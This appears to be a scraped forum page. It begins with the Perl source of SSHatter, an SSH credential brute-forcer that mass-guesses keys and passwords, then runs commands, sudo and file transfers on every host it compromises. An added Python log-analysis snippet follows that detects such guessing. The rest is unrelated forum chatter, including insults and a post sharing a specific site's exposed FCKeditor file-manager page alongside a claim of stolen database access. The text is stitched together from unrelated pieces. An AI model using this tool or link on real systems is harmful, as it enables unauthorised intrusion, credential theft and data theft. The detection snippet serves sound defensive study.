# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
#
# (c) Tim Brown, 2009
# <mailto:timb@nth-dimension.org.uk>
# <http://www.nth-dimension.org.uk/> / <http://www.machine.org.uk/>

use strict;

package SSHatter::SSH::Host;

use Net::SSH::Perl;

sub new {
    my $class;
    my $self;
    $class = shift;
    $self = {};
    bless($self, $class);
    $self->{'hostname'} = shift;
    $self->{'portnumber'} = shift;
    return $self;
}

sub info {
    my $self;
    $self = shift;
    return $self->{'hostname'} . ":" . $self->{'portnumber'};
}

sub pipe {
    my $self;
    $self = shift;
    pipe($self->{'readhandle'}, $self->{'writehandle'});
}

sub checkbykey {
    my $self;
    my $username;
    my $key;
    my $sshhandle;
    $self = shift;
    $username = shift;
    $key = shift;
    eval {
        $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$key], options => ["PasswordAuthentication no"]);
    };
    if ($@ ne "") {
        die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
    } else {
        eval {
            $sshhandle->login($username);
            $sshhandle->cmd("echo SSHatter");
        };
        if ($@ ne "") {
            if ($@ !~ /Permission denied/) {
                die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
            } else {
                return 0;
            }
        }
    }
    return 1;
}

sub checkbypassword {
    my $self;
    my $username;
    my $password;
    my $sshhandle;
    $self = shift;
    $username = shift;
    $password = shift;
    eval {
        $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'});
    };
    if ($@ ne "") {
        die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
    } else {
        eval {
            $sshhandle->login($username, $password);
            $sshhandle->cmd("echo SSHatter");
        };
        if ($@ ne "") {
            if ($@ !~ /Permission denied/) {
                die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
            } else {
                return 0;
            }
        }
    }
    return 1;
}

sub writehandle {
    my $self;
    $self = shift;
    return $self->{'writehandle'};
}

sub readhandle {
    my $self;
    $self = shift;
    return $self->{'readhandle'};
}

sub unpipe {
    my $self;
    $self = shift;
    close($self->{'writehandle'});
}

sub addkey {
    my $self;
    my $username;
    my $key;
    $self = shift;
    $username = shift;
    $key = shift;
    $self->{'keys'}{$username} = $key;
}

sub addpassword {
    my $self;
    my $username;
    my $password;
    $self = shift;
    $username = shift;
    $password = shift;
    $self->{'passwords'}{$username} = $password;
}

sub usernamesbykey {
    my $self;
    $self = shift;
    return keys(%{$self->{'keys'}});
}

sub usernamesbypassword {
    my $self;
    $self = shift;
    return keys(%{$self->{'passwords'}});
}

sub key {
    my $self;
    my $username;
    $self = shift;
    $username = shift;
    return $self->{'keys'}{$username};
}

sub password {
    my $self;
    my $username;
    $self = shift;
    $username = shift;
    return $self->{'passwords'}{$username};
}

sub executebykey {
    my $self;
    my $username;
    my $commandstring;
    my $sshhandle;
    my @resultstrings;
    $self = shift;
    $username = shift;
    $commandstring = shift;
    eval {
        $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'}, identity_files => [$self->{'keys'}{$username}], options => ["PasswordAuthentication no"]);
    };
    if ($@ ne "") {
        die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
    } else {
        eval {
            print "[" . $username . ":" . $self->{'keys'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n";
            $sshhandle->login($username);
            @resultstrings = $sshhandle->cmd($commandstring);
        };
        if ($@ ne "") {
            if ($@ !~ /Permission denied/) {
                die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
            } else {
                return ("", "", -42);
            }
        }
    }
    return @resultstrings;
}

sub executebypassword {
    my $self;
    my $username;
    my $sudoflag;
    my $commandstring;
    my $sshhandle;
    my @resultstrings;
    $self = shift;
    $username = shift;
    $sudoflag = shift;
    $commandstring = shift;
    eval {
        $sshhandle = Net::SSH::Perl->new($self->{'hostname'}, port => $self->{'portnumber'});
    };
    if ($@ ne "") {
        die "SSHatter::Exception::Host::Check::Net::SSH::Perl::New";
    } else {
        eval {
            $sshhandle->login($username, $self->{'passwords'}{$username});
            print "[" . $username . ":" . $self->{'passwords'}{$username} . "@" . $self->info() . "]\$ " . $commandstring . "\n";
            if (defined($sudoflag)) {
                @resultstrings = $sshhandle->cmd($commandstring, $self->{'passwords'}{$username} . "\n");
            } else {
                @resultstrings = $sshhandle->cmd($commandstring);
            }
        };
        if ($@ ne "") {
            if ($@ !~ /Permission denied/) {
                die "SSHatter::Exception::Host::Check::Net::SSH::Perl::Cmd";
            } else {
                return ("", "", -42);
            }
        }
    }
    return @resultstrings;
}

package SSHatter;

use File::Basename;
use Getopt::Std;
use Parallel::ForkManager;

my %argumentslist;
my $maximumprocess;
my $targetserverfilename;
my $usernamefilename;
my $keydirectoryname;
my $passwordfilename;
my $dumbflag;
my $sudoflag;
my $safeflag;
my $masscommand;
my $interactiveflag;
my $localfilename;
my $remotefilename;
my $targetserverhandle;
my $targetserverstring;
my $hostname;
my $portnumber;
my $forkmanager;
my $targetserver;
my $processid;
my $writehandle;
my $usernamehandle;
my $usernamestring;
my $keyfilename;
my $passwordhandle;
my $passwordstring;
my @targetservers;
my $username;
my $confirmresponse;
my @resultstrings;
my $nextcommand;
my $localfilehandle;
my $localfilebyte;
my $localfiledata;

sub parsetarget {
    my $targetserverstring;
    my $hostname;
    my $portnumber;
    $targetserverstring = shift;
    $targetserverstring =~ s/\x0a//g;
    ($hostname, $portnumber) = split(/:/, $targetserverstring);
    if ($portnumber && ($portnumber =~ /([0-9]+)/)) {
        $portnumber = $1;
        if (($portnumber <= 0) || ($portnumber > 65535)) {
            $portnumber = 22;
        }
    } else {
        $portnumber = 22;
    }
    return ($hostname, $portnumber);
}

sub main::HELP_MESSAGE {
    die "usage: " . basename($0) . " -x <maximumprocess> -t <targetserverfilename> -u <usernamefilename> <[-k <keydirectoryname>] [-p <passwordfilename>] [-d]> [[-0] [-s] -m <masscommand> | [-0] [-s] -i | -P <localfilename> | -G <remotefilename>]

-d - dumb mode, try username equals password, username, blank
-0 - sudo mode, echo the password to STDIN (useful for systems where sudo -S works)
-s - safe mode, prompt before executing
-m - mass mode, run one command across all targets
-i - interactive mode, run multiple commands across all targets (non-persistant)
-P - upload a file
-G - download a file

If sudo mode is not enabled, then " . $0 . " will block on STDIN.";
}

sub main::VERSION_MESSAGE {
    print basename($0) . " 1.0\n";
}

$Getopt::Std::STANDARD_HELP_VERSION = 1;
getopts("x:t:u:k:p:d0sm:iP:G:", \%argumentslist);
if (defined($argumentslist{'x'}) && ($argumentslist{'x'} =~ /([0-9]+)/)) {
    $maximumprocess = $1;
} else {
    Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'t'}) && (-e $argumentslist{'t'})) {
    $targetserverfilename = $argumentslist{'t'};
} else {
    Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'u'}) && (-e $argumentslist{'u'})) {
    $usernamefilename = $argumentslist{'u'};
} else {
    Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'k'}) && (-e $argumentslist{'k'})) {
    $keydirectoryname = $argumentslist{'k'};
}
if (defined($argumentslist{'p'}) && (-e $argumentslist{'p'})) {
    $passwordfilename = $argumentslist{'p'};
}
if (defined($argumentslist{'d'})) {
    $dumbflag = 1;
}
if (!defined($keydirectoryname) && !defined($passwordfilename) && !defined($dumbflag)) {
    Getopt::Std::help_mess("", "main");
}
if (defined($argumentslist{'0'})) {
    $sudoflag = 1;
}
if (defined($argumentslist{'s'})) {
    $safeflag = 1;
}
if (defined($argumentslist{'m'})) {
    $masscommand = $argumentslist{'m'};
} else {
    if (defined($argumentslist{'i'})) {
        $interactiveflag = 1;
    } else {
        if (defined($argumentslist{'P'})) {
            if (-e $argumentslist{'P'}) {
                $localfilename = $argumentslist{'P'};
            }
else { Getopt::Std::help_mess("", "main"); } } else { if (defined($argumentslist{'G'})) { $remotefilename = $argumentslist{'G'}; } } } } $forkmanager = Parallel::ForkManager->new($maximumprocess); $forkmanager->run_on_finish(sub { my $processid; my $returncode; my $targetserver; my $readhandle; my $readdata; my $credentialtype; my $username; my $credentialstring; $processid = shift; $returncode = shift; $targetserver = shift; $targetserver->unpipe(); $readhandle = $targetserver->readhandle(); while ($readdata = <$readhandle>) { $readdata =~ s/\x0a//g; ($credentialtype, $username, $credentialstring) = split(/ /, $readdata); if ($credentialtype eq "K") { $targetserver->addkey($username, $credentialstring); } else { $targetserver->addpassword($username, $credentialstring); } } close($readhandle); print STDERR "I: " . $targetserver->info() . " finished\n"; }); open($targetserverhandle, "<" . $targetserverfilename); while ($targetserverstring = <$targetserverhandle>) { ($hostname, $portnumber) = parsetarget($targetserverstring); $targetserver = SSHatter::SSH::Host->new($hostname, $portnumber); print STDERR "I: " . $targetserver->info() . "\n"; push(@targetservers, $targetserver); $targetserver->pipe(); $processid = $forkmanager->start($targetserver) and next; $writehandle = $targetserver->writehandle(); open($usernamehandle, "<" . $usernamefilename); while ($usernamestring = <$usernamehandle>) { $usernamestring =~ s/\x0a//g; if (defined($keydirectoryname)) { while ($keyfilename = <$keydirectoryname/*>) { if ($targetserver->checkbykey($usernamestring, $keyfilename) == 1) { print $writehandle "K" . " " . $usernamestring . " " . $keyfilename . "\n"; } } } if (defined($passwordfilename)) { open($passwordhandle, "<" . $passwordfilename); while ($passwordstring = <$passwordhandle>) { $passwordstring =~ s/\x0a//g; if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . 
"\n"; } } close($passwordhandle); } if (defined($dumbflag)) { foreach $passwordstring (("", "password", $usernamestring)) { if ($targetserver->checkbypassword($usernamestring, $passwordstring) == 1) { print $writehandle "P" . " " . $usernamestring . " " . $passwordstring . "\n"; } } } } close($usernamehandle); $forkmanager->finish(); } close($targetserverhandle); $forkmanager->wait_all_children(); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { print $username . ":" . $targetserver->key($username) . "@" . $targetserver->info() . "\n"; } foreach $username ($targetserver->usernamesbypassword()) { print $username . ":" . $targetserver->password($username) . "@" . $targetserver->info() . "\n"; } } if ((defined($masscommand) || defined($interactiveflag)) && defined($safeflag)) { print "W: executing " . (defined($masscommand) ? $masscommand : "in interactive mode") . ", continue? [y/N] "; $confirmresponse = <>; if ($confirmresponse !~ /^[Yy]/) { exit(1); } } if (defined($masscommand)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $masscommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if (defined($interactiveflag)) { print "\$ "; while ($nextcommand = <>) { $nextcommand =~ s/\x0a//g; if ($nextcommand eq "exit") { last; } else { if ($nextcommand =~ /put (.*)/) { open($localfilehandle, "<" . 
$1); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($1)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if ($nextcommand =~ /get (.*)/) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $1); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . 
basename($1)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } else { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, $sudoflag, $nextcommand); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } } } print "\$ "; } } else { if (defined($localfilename)) { open($localfilehandle, "<" . $localfilename); binmode($localfilehandle); while (read($localfilehandle, $localfilebyte, 1) != 0) { $localfiledata .= sprintf("\\x%02x", ord($localfilebyte)); } close($localfilehandle); foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "printf \"" . $localfiledata . "\" >> " . basename($localfilename)); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { print $resultstrings[0]; } } } } else { if (defined($remotefilename)) { foreach $targetserver (@targetservers) { foreach $username ($targetserver->usernamesbykey()) { @resultstrings = $targetserver->executebykey($username, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . 
basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } foreach $username ($targetserver->usernamesbypassword()) { @resultstrings = $targetserver->executebypassword($username, 0, "cat " . $remotefilename); if (($resultstrings[2] != -42) && defined($resultstrings[0])) { open($localfilehandle, ">" . $username . "@" . $targetserver->info() . "-" . basename($remotefilename)); print $localfilehandle $resultstrings[0]; close($localfilehandle); } } } } } } } exit(1); sshatter
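Seen from the server, the loop in the script above (every username in the list tried against one host with each key and password) leaves a run of failed logins for many different accounts from a single source in the sshd log. The following is an added detection example, not part of the original post or of SSHatter; the log lines are constructed samples in OpenSSH's syslog format and the thresholds are assumptions to tune per environment.

```python
import re
from collections import defaultdict

# Constructed sample log (documentation address ranges, not real hosts).
SAMPLE_LOG = """\
Jan 10 03:14:01 gw sshd[811]: Failed password for invalid user admin from 203.0.113.7 port 40112 ssh2
Jan 10 03:14:02 gw sshd[812]: Failed password for invalid user test from 203.0.113.7 port 40120 ssh2
Jan 10 03:14:03 gw sshd[813]: Failed password for root from 203.0.113.7 port 40131 ssh2
Jan 10 03:14:04 gw sshd[814]: Failed password for backup from 203.0.113.7 port 40139 ssh2
Jan 10 03:14:05 gw sshd[815]: Accepted password for backup from 203.0.113.7 port 40147 ssh2
Jan 10 08:30:11 gw sshd[990]: Failed password for alice from 198.51.100.20 port 51514 ssh2
Jan 10 08:30:19 gw sshd[991]: Accepted password for alice from 198.51.100.20 port 51522 ssh2
"""

EVENT = re.compile(
    r"sshd\[\d+\]: (?P<result>Failed|Accepted) (?P<method>password|publickey) "
    r"for (?:invalid user )?(?P<user>\S+) from (?P<src>\S+) port \d+"
)

def analyze(log_text, min_failures=3, min_users=3):
    """Return {source: report} for sources whose failures look like list-driven guessing."""
    failures = defaultdict(int)   # failed attempts per source address
    users = defaultdict(set)      # distinct account names tried per source
    hits = defaultdict(list)      # logins accepted after the source crossed both thresholds
    for line in log_text.splitlines():
        m = EVENT.search(line)
        if not m:
            continue
        src, user = m["src"], m["user"]
        if m["result"] == "Failed":
            failures[src] += 1
            users[src].add(user)
        elif failures[src] >= min_failures and len(users[src]) >= min_users:
            # A success right after a guessing run is the event to triage first.
            hits[src].append((user, m["method"]))
    return {
        src: {"failures": n, "users": sorted(users[src]), "accepted_after": hits[src]}
        for src, n in failures.items()
        if n >= min_failures and len(users[src]) >= min_users
    }

if __name__ == "__main__":
    for src, report in analyze(SAMPLE_LOG).items():
        print(src, report)
```

A single mistyped password followed by a success, as for `alice` in the sample, stays below both thresholds and is not reported.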
-
That picture as big as a house looks bad. Shrink it.
-
Mantra is a dream that came true. It is a collection of free and open source tools integrated into a web browser, which can become handy for students, penetration testers, web application developers, security professionals etc. It is portable, ready-to-run, compact and follows the true spirit of free and open source software. Mantra is a security framework which can be very helpful in performing all the five phases of attacks including reconnaissance, scanning and enumeration, gaining access, escalation of privileges, maintaining access, and covering tracks. Apart from that it also contains a set of tools targeted for web developers and code debuggers which makes it handy for both offensive security and defensive security related tasks. Mantra is lite, flexible, portable and user friendly with a nice graphical user interface. You can carry it in memory cards, flash drives, CD/DVDs, etc. It can be run natively on Linux, Windows and Mac platforms. It can also be installed on to your system within minutes. Mantra is absolutely free of cost and takes no time for you to set up. Download
-
You're pathetic. Go away.
-
Happy birthday! I hope it is your birthday, so that I'm not wishing you this for nothing.
-
Tor-ramdisk is an i686 uClibc-based micro Linux distribution whose sole purpose is to securely host a Tor server purely in RAM. For those not familiar with Tor, it is a system which allows the user to construct encrypted virtual tunnels which are randomly relayed between Tor servers (nodes) until the connection finally exits to its destination on the internet. The encryption and random relaying resist traffic analysis in that a malicious sniffer cannot easily discover where the traffic is coming from or what data it contains. While not perfect in its efforts to provide users with anonymity, Tor does help protect against unscrupulous companies, individuals or agencies from "watching us". For more information, see the Tor official site.

The usefulness of a RAM only environment for Tor became apparent to me when Janssen was arrested by the German police towards the end of July, 2007. (You can read the full story in a CNET article.) While the police did not seize the computer for whatever reasons, they certainly could have. More typically, it would have been taken for forensic analysis of the data on the drives. Of course, if the computer housing the Tor server has no drives, there can be no question that it is purely a network relaying device and that one should look elsewhere for the "goods".

Other advantages became clear: It is useful to operators that want all traces of the server to disappear on powerdown. This includes the private SSL keys which can be housed externally. The environment can be hardened in a manner specific to the limited needs of Tor. It has the usual speed advantages of diskless systems and can run on older hardware.

The only known disadvantage is that it cannot host Tor hidden services which would require other services (e.g. http), and their resources (e.g. hard drive space), in addition to the Tor server itself. However, as a middle or exit node, it is ideal.

Downloads

PS. made my day
-
Grooveshark - Listen to Free Music Online - Internet Radio - Free MP3 Streaming
-
Use php-fusion. It has a strong Romanian community, and Nicu (the admin) is very skilled and will help you.
-
Simple: php-fusion. Complex: joomla. My opinion: your own CMS. Why? Secure.
-
Later edit: I had their database. Let me check whether I still have it. Later edit 2: http://7n.ro/fckeditor/editor/filemanager/connectors/test.html go happy, good luck
-
Are you going to host rstcenter.com there so that it runs well for you? Anyway... all the best, and honestly I'm curious about the feedback.
-
Debian. Reason: Ubuntu is for little girls.
-
Good luck. Do they have internet there?
-
DoS application that can take down 90% of the world's servers
adi003user replied to ZeroCold's topic in Stiri securitate
That application is rather shiny for a serious DoS tool... A GUI with the rotating Earth? It reminded me of Swordfish, when that guy had 3 monitors.
-
What model is the Intel network card? What make/model is the switch?